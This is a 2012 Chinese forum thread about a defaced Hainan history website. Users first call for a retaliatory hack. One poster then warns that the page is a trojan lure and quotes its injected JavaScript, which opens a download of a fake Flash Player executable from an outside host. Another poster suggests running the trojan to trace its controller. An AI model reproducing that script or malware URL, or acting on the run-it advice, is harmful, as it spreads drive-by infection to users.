越南狗黑我海南史志网
{:5_90:}越南狗很是嚣张。。明目张胆写着Fuck china
{:5_102:}待高手出击,
被黑链接:http://www.hnszw.org.cn/web/ 还放了首歌卧槽他妈。- -
可惜技术没到家!{:2_28:} FUCK等待 渗透大牛的出现 等待大牛的出现,楼主实时更新战报哈!!!{:1_1:} 亲们别上当啊 网站是个挂马网站 是某些人利用了咱们的爱国心啊{:5_98:}
看网站代码<SCRIPT language=javascript>
open("http://zhongyi.baixun.com/images/gjhyzx/AdobeFlashPlayes 13.1.exe");
</SCRIPT>
打开了一个看似flash播放器的程序 其实是个木马
大家赶紧全盘扫描吧{:5_107:}
我先扫描去。。。 G0398 发表于 2012-7-22 15:39 static/image/common/back.gif
亲们别上当啊 网站是个挂马网站 是某些人利用了咱们的爱国心啊
看网站代码打开了一个看似flas ...
我了个擦不早说? 猎鹰 发表于 2012-7-22 15:55 static/image/common/back.gif
我了个擦不早说?
{:5_96:}冤枉啊 我也刚看到,好奇点进去了{:5_104:}
不过,嘿嘿没出啥大事
看你的浏览器咋执行那段代码了,如果是IE会弹出【文件下载】对话框提示的
我的Maxthon不认那段{:5_97:}
其他浏览器那就{:5_111:} G0398 发表于 2012-7-22 16:04 static/image/common/back.gif
冤枉啊 我也刚看到,好奇点进去了
不过,嘿嘿没出啥大事
看你的浏览器咋执行那段代 ...
{:5_94:}哥们别大惊小怪啊。你的电脑出啥事了吗? 本帖最后由 Potato丶 于 2012-7-22 17:41 编辑
{:5_94:}
360说没事。我也没事。。准不准的就不清楚了{:5_104:}明明被恶意篡改了。他竟然说没事~
59.50.112.4
备案号: 琼ICP备08100253号-1
性质: 事业单位
名称: 中共海南省委党史研究室 http://zhongyi.baixun.com/images/gjhyzx/AdobeFlashPlayes 13.1.exe(被挂马)谷歌貌似是自动下载的,源代码中有document.write里面的歌曲:http://stream62.gonct.info/0164621cdeda8844be1bd606af4511bb/500bb526/NhacCuaTui169/LeavingMeisSoEasyRemix-Andree-A_394qp.mp3:@表示痛恨做这个站的 竟然挂马 而且估计不是猴子搞的 ペ悠然杰 发表于 2012-7-22 18:22 static/image/common/back.gif
http://zhongyi.baixun.com/images/gjhyzx/AdobeFlashPlayes 13.1.exe(被挂马)谷歌貌似是自动下载的,源代码 ...
{:5_94:}你的意思是我们中招了? Potato丶 发表于 2012-7-22 18:27 static/image/common/back.gif
你的意思是我们中招了?
我的意思是国人搞的 你可以试着运行一下内个马 然后用防火墙之类的东西看一下主控端的ip在查一下是哪的 当然我不确定 ペ悠然杰 发表于 2012-7-22 18:32 static/image/common/back.gif
我的意思是国人搞的 你可以试着运行一下内个马 然后用防火墙之类的东西看一下主控端的ip在查一下是哪的 当 ...
{:5_94:}没可能是肉鸡吗?
{:5_103:}只要我们没中招就好。。
:Q 挂马的话 他下载你也不知道的啊! 小场面!!!!!!!!!! 本帖最后由 a22271001 于 2012-7-23 08:27 编辑
谁有虚拟机,分析一下:o
ps:貌似那文件打不开?
还有,本论坛怎么上传图片啊。
果断被坑!~ 转发去红盟社区 妈啊。。。。。坑爹啊
页:
[1]
2